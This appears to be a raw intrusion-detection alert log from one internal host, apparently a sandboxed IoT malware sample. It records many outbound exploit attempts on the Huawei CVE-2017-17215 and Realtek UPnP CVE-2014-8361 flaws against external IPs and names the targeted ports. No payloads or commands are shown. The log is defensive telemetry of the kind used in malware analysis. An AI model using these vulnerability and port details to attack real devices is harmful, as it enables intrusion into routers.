                                      07/20/24-23:01:00.651026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3861437215192.168.2.23157.207.43.131
                                      07/20/24-23:01:45.098864TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24241052869192.168.2.23174.232.185.220
                                      07/20/24-23:01:58.031141TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5437052869192.168.2.2368.209.51.160
                                      07/20/24-23:01:27.668073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3516037215192.168.2.23197.157.98.132
                                      07/20/24-23:01:14.095462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5512237215192.168.2.23190.39.12.159
                                      07/20/24-23:01:44.469580TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613384852869192.168.2.2339.189.20.84
                                      07/20/24-23:01:14.105395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4260237215192.168.2.23221.45.252.241
                                      07/20/24-23:01:41.608574TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615552452869192.168.2.23208.24.233.14
                                      07/20/24-23:01:44.186066TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4988252869192.168.2.23205.136.89.238
                                      07/20/24-23:01:11.828422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3803237215192.168.2.23157.52.72.38
                                      07/20/24-23:01:08.646615TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5466452869192.168.2.23150.181.42.248
                                      07/20/24-23:01:12.888802TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5298452869192.168.2.2362.245.86.200
                                      07/20/24-23:01:20.131339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3809837215192.168.2.23157.9.9.217
                                      07/20/24-23:01:44.215876TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5290652869192.168.2.23213.139.230.45
                                      07/20/24-23:01:47.934101TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24224452869192.168.2.23171.195.37.248
                                      07/20/24-23:01:53.261844TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23620452869192.168.2.2371.66.59.209
                                      07/20/24-23:01:07.075937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4513037215192.168.2.23157.1.231.94
                                      07/20/24-23:01:47.385543TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3337252869192.168.2.23196.46.94.209
                                      07/20/24-23:01:49.803911TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25884652869192.168.2.2324.200.205.123
                                      07/20/24-23:01:43.528109TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615807652869192.168.2.2379.130.195.101
                                      07/20/24-23:01:45.048479TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613611652869192.168.2.23147.236.68.25
                                      07/20/24-23:01:42.357440TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615616452869192.168.2.2342.7.66.220
                                      07/20/24-23:01:06.975117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4215237215192.168.2.23157.179.86.20
                                      07/20/24-23:01:44.757783TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4942652869192.168.2.2371.205.8.144
                                      07/20/24-23:01:00.634497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4106837215192.168.2.2341.130.229.37
                                      07/20/24-23:01:24.904906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4172637215192.168.2.23197.233.159.133
                                      07/20/24-23:00:57.221748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4772837215192.168.2.2341.6.98.70
                                      07/20/24-23:01:01.805210TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5599852869192.168.2.2344.70.248.184
                                      07/20/24-23:02:04.525064TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3841252869192.168.2.2372.19.23.60
                                      07/20/24-23:01:40.336908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3625037215192.168.2.23187.11.252.34
                                      07/20/24-23:01:04.098909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4230837215192.168.2.23157.37.182.204
                                      07/20/24-23:01:42.632123TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25708652869192.168.2.23176.127.40.36
                                      07/20/24-23:01:46.241196TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6024252869192.168.2.23167.230.66.89
                                      07/20/24-23:01:45.134490TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25705452869192.168.2.23186.231.211.62
                                      07/20/24-23:01:57.346494TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616031452869192.168.2.23143.152.117.80
                                      07/20/24-23:01:20.124696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3329837215192.168.2.23197.172.242.183
                                      07/20/24-23:01:00.633275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3911437215192.168.2.23197.196.77.201
                                      07/20/24-23:01:47.108019TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23312852869192.168.2.23124.217.174.35
                                      07/20/24-23:01:41.974742TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6082452869192.168.2.23167.210.235.204
                                      07/20/24-23:01:46.225146TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4775852869192.168.2.2390.202.157.65
                                      07/20/24-23:01:43.141192TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615872652869192.168.2.2348.248.156.6
                                      07/20/24-23:01:12.852602TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24125452869192.168.2.23217.106.167.57
                                      07/20/24-23:01:25.988229TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3798652869192.168.2.2361.172.152.113
                                      07/20/24-23:01:58.701160TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24270452869192.168.2.2380.120.36.80
                                      07/20/24-23:01:41.912337TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3642452869192.168.2.2332.146.19.98
                                      07/20/24-23:01:58.424201TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25777452869192.168.2.2398.158.142.52
                                      07/20/24-23:01:02.236183TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4849452869192.168.2.23124.144.192.144
                                      07/20/24-23:01:24.867858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5321437215192.168.2.23197.131.189.107
                                      07/20/24-23:01:49.456461TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5187652869192.168.2.23203.13.28.171
                                      07/20/24-23:01:53.654810TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614643452869192.168.2.2379.113.232.226
                                      07/20/24-23:01:21.954501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3711637215192.168.2.2327.137.24.94
                                      07/20/24-23:01:47.818739TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4976652869192.168.2.2367.31.108.66
                                      07/20/24-23:01:43.541579TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4509052869192.168.2.23213.118.6.220
                                      07/20/24-23:01:20.149798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5857837215192.168.2.2323.212.5.129
                                      07/20/24-23:01:41.443693TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615842452869192.168.2.2370.82.6.11
                                      07/20/24-23:01:44.114134TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616042452869192.168.2.2332.0.100.142
                                      07/20/24-23:01:54.881105TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613349252869192.168.2.23135.46.10.64
                                      07/20/24-23:01:31.314147TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5859652869192.168.2.2336.69.228.71
                                      07/20/24-23:01:46.284457TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5340652869192.168.2.23212.16.123.155
                                      07/20/24-23:01:42.462291TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24637052869192.168.2.23187.89.64.185
                                      07/20/24-23:02:00.056416TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25506052869192.168.2.23171.38.97.128
                                      07/20/24-23:02:02.632381TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4931052869192.168.2.23112.44.8.51
                                      07/20/24-23:01:42.696197TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4162052869192.168.2.23174.232.185.220
                                      07/20/24-23:01:44.440718TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5530252869192.168.2.2349.137.23.5
                                      07/20/24-23:00:59.218458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5149037215192.168.2.2341.75.68.114
                                      07/20/24-23:01:45.519460TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3647652869192.168.2.23147.236.68.25
                                      07/20/24-23:01:34.045144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3887237215192.168.2.23197.95.167.27
                                      07/20/24-23:01:44.156178TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615833052869192.168.2.23221.223.71.222
                                      07/20/24-23:01:20.593640TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5079452869192.168.2.2390.205.64.234
                                      07/20/24-23:01:42.778303TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24160852869192.168.2.2363.208.18.63
                                      07/20/24-23:01:44.674251TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4945652869192.168.2.2337.192.4.35
                                      07/20/24-23:01:47.829810TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4694252869192.168.2.23207.5.145.91
                                      07/20/24-23:01:04.227976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3987437215192.168.2.23197.234.180.134
                                      07/20/24-23:01:52.684130TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614402252869192.168.2.232.109.1.91
                                      07/20/24-23:01:07.114267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4881837215192.168.2.23157.195.69.11
                                      07/20/24-23:01:25.526897TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4886852869192.168.2.23116.88.149.60
                                      07/20/24-23:01:41.699842TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615761452869192.168.2.2370.95.192.176
                                      07/20/24-23:01:41.303455TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614466852869192.168.2.23211.87.162.144
                                      07/20/24-23:01:43.636703TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23780452869192.168.2.2371.221.213.203
                                      07/20/24-23:01:21.952782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4976437215192.168.2.2341.89.247.80
                                      07/20/24-23:01:49.064169TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4331252869192.168.2.23203.94.134.229
                                      07/20/24-23:01:00.640312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3486437215192.168.2.23197.115.124.156
                                      07/20/24-23:01:31.981855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4658237215192.168.2.23197.184.167.162
                                      07/20/24-23:01:41.340201TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3791852869192.168.2.23220.210.17.223
                                      07/20/24-23:01:46.985099TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615173852869192.168.2.2323.8.251.245
                                      07/20/24-23:01:47.766845TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24974452869192.168.2.2357.81.97.111
                                      07/20/24-23:01:34.045144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5168437215192.168.2.23157.248.228.18
                                      07/20/24-23:01:08.659435TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25183252869192.168.2.2378.39.181.117
                                      07/20/24-23:01:42.637859TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613973652869192.168.2.2358.25.190.68
                                      07/20/24-23:01:53.581574TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615592652869192.168.2.2393.94.222.156
                                      07/20/24-23:01:06.989167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5488237215192.168.2.2341.134.100.161
                                      07/20/24-23:01:08.589759TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3594852869192.168.2.2327.130.132.139
                                      07/20/24-23:01:42.115230TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4886852869192.168.2.23156.42.191.231
                                      07/20/24-23:01:31.591880TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25089052869192.168.2.23172.14.168.150
                                      07/20/24-23:01:00.633642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4243437215192.168.2.23155.28.185.96
                                      07/20/24-23:01:08.559170TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4712652869192.168.2.23190.124.94.237
                                      07/20/24-23:01:40.286738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5490437215192.168.2.23157.149.48.241
                                      07/20/24-23:01:27.653586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3369037215192.168.2.23192.80.253.11
                                      07/20/24-23:01:07.022763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5796837215192.168.2.23171.136.141.166
                                      07/20/24-23:01:43.874054TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23708852869192.168.2.23162.100.122.131
                                      07/20/24-23:01:50.147840TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613452252869192.168.2.23191.136.148.80
                                      07/20/24-23:01:42.839255TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5108652869192.168.2.23145.203.252.98
                                      07/20/24-23:01:25.263099TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613399652869192.168.2.23181.111.14.150
                                      07/20/24-23:01:43.965131TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614179052869192.168.2.2324.0.173.57
                                      07/20/24-23:01:41.295497TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613667852869192.168.2.2358.43.60.192
                                      07/20/24-23:01:42.704900TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25618052869192.168.2.23191.59.254.237
                                      07/20/24-23:01:55.974605TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5330652869192.168.2.23111.101.151.97
                                      07/20/24-23:01:46.817503TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3933652869192.168.2.2342.169.174.111
                                      07/20/24-23:01:44.680845TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24626852869192.168.2.23191.8.175.218
                                      07/20/24-23:01:44.757783TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24503052869192.168.2.23106.184.161.191
                                      07/20/24-23:01:43.946478TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5114852869192.168.2.23108.216.198.203
                                      07/20/24-23:01:51.290015TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4380052869192.168.2.239.66.181.144
                                      07/20/24-23:01:02.113054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3551237215192.168.2.2385.79.139.138
                                      07/20/24-23:01:11.816504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5316837215192.168.2.23157.236.178.97
                                      07/20/24-23:01:10.491660TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3969652869192.168.2.2344.76.102.214
                                      07/20/24-23:00:59.204975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4874237215192.168.2.23197.251.31.217
                                      07/20/24-23:01:50.085627TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614268652869192.168.2.23138.246.10.144
                                      07/20/24-23:01:46.308516TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615433452869192.168.2.2336.130.15.144
                                      07/20/24-23:02:00.856771TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4237052869192.168.2.23164.216.95.45
                                      07/20/24-23:01:07.018425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5927637215192.168.2.23162.118.10.225
                                      07/20/24-23:01:20.169339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3318237215192.168.2.23157.202.95.80
                                      07/20/24-23:01:40.322860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4807037215192.168.2.23197.89.86.7
                                      07/20/24-23:00:57.221790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5384237215192.168.2.23197.55.83.122
                                      07/20/24-23:01:42.641430TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3344852869192.168.2.2367.229.67.72
                                      07/20/24-23:01:46.113314TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23465252869192.168.2.2378.241.170.132
                                      07/20/24-23:01:52.041756TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613688852869192.168.2.23135.204.232.202
                                      07/20/24-23:01:47.092270TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615462052869192.168.2.2341.203.104.16
                                      07/20/24-23:01:27.650975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3576437215192.168.2.23222.180.112.139
                                      07/20/24-23:01:44.602822TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5772652869192.168.2.2334.53.132.35
                                      07/20/24-23:01:34.043969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4958237215192.168.2.23125.81.157.125
                                      07/20/24-23:01:45.104633TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3770252869192.168.2.23223.250.7.213
                                      07/20/24-23:01:27.649996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4201037215192.168.2.23197.216.112.16
                                      07/20/24-23:01:04.747554TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5782452869192.168.2.2343.227.14.32
                                      07/20/24-23:01:43.938688TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4981252869192.168.2.234.66.151.191
                                      07/20/24-23:01:58.028191TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24047852869192.168.2.23175.65.204.131
                                      07/20/24-23:01:08.683685TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3334452869192.168.2.23117.76.49.30
                                      07/20/24-23:01:31.979752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4809237215192.168.2.23197.207.171.251
                                      07/20/24-23:01:52.625240TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614952652869192.168.2.23200.250.178.79
                                      07/20/24-23:01:14.100332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5806637215192.168.2.2341.200.152.219
                                      07/20/24-23:01:20.098209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4938237215192.168.2.23157.234.70.152
                                      07/20/24-23:02:20.374641TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614173652869192.168.2.23198.93.236.85
                                      07/20/24-23:01:04.773524TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613900852869192.168.2.23159.70.111.204
                                      07/20/24-23:01:08.686799TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3600052869192.168.2.23219.114.72.114
                                      07/20/24-23:01:11.828422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3835037215192.168.2.23197.139.101.249
                                      07/20/24-23:01:49.138222TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23870452869192.168.2.23159.143.86.166
                                      07/20/24-23:01:11.816294TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4659037215192.168.2.23157.147.43.148
                                      07/20/24-23:01:20.096752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4085637215192.168.2.2341.15.94.102
                                      07/20/24-23:01:44.954688TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25017052869192.168.2.23183.249.169.230
                                      07/20/24-23:01:07.062666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4820637215192.168.2.23197.216.11.202
                                      07/20/24-23:01:20.132103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3582437215192.168.2.23141.24.192.29
                                      07/20/24-23:01:08.663245TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3719052869192.168.2.2399.2.133.89
                                      07/20/24-23:01:26.156407TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3889852869192.168.2.23148.228.70.58
                                      07/20/24-23:01:44.007374TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613994252869192.168.2.23178.91.194.150
                                      07/20/24-23:00:57.222207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3471837215192.168.2.23197.89.108.63
                                      07/20/24-23:01:42.509004TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24959452869192.168.2.231.84.241.246
                                      07/20/24-23:01:04.031511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4411837215192.168.2.2341.78.221.227
                                      07/20/24-23:01:41.275004TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615957252869192.168.2.2353.20.116.108
                                      07/20/24-23:01:06.990165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4584037215192.168.2.23197.128.152.66
                                      07/20/24-23:01:31.979565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5329437215192.168.2.23157.166.228.6
                                      07/20/24-23:01:40.336908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4918837215192.168.2.2341.183.204.254
                                      07/20/24-23:01:42.943881TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5374252869192.168.2.23171.174.164.32
                                      07/20/24-23:01:00.635367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6053037215192.168.2.2341.50.33.93
                                      07/20/24-23:01:27.749737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4312237215192.168.2.2341.28.206.33
                                      07/20/24-23:01:49.356902TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613989852869192.168.2.2313.35.187.229
                                      07/20/24-23:00:57.221802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4352037215192.168.2.2361.117.29.155
                                      07/20/24-23:01:25.347089TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4524652869192.168.2.2349.81.102.7
                                      07/20/24-23:01:59.745622TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613805852869192.168.2.23119.78.161.123
                                      07/20/24-23:02:02.387600TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614751652869192.168.2.23119.168.200.153
                                      07/20/24-23:01:44.520226TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5156252869192.168.2.23114.151.113.249
                                      07/20/24-23:01:41.494999TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614417252869192.168.2.23219.196.203.133
                                      07/20/24-23:00:59.175742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5893237215192.168.2.23157.211.77.112
                                      07/20/24-23:01:45.298541TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613944452869192.168.2.2338.110.137.130
                                      07/20/24-23:01:57.434940TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23401252869192.168.2.2374.191.12.65
                                      07/20/24-23:01:06.990535TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5266637215192.168.2.23158.38.51.47
                                      07/20/24-23:01:59.377547TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4943052869192.168.2.23208.150.189.204
                                      07/20/24-23:01:42.985200TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614804452869192.168.2.2312.82.126.36
                                      07/20/24-23:01:51.743446TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5673052869192.168.2.2390.237.72.71
                                      07/20/24-23:01:03.953624TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615243252869192.168.2.23150.181.42.248
                                      07/20/24-23:01:48.386032TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4138252869192.168.2.2385.103.184.164
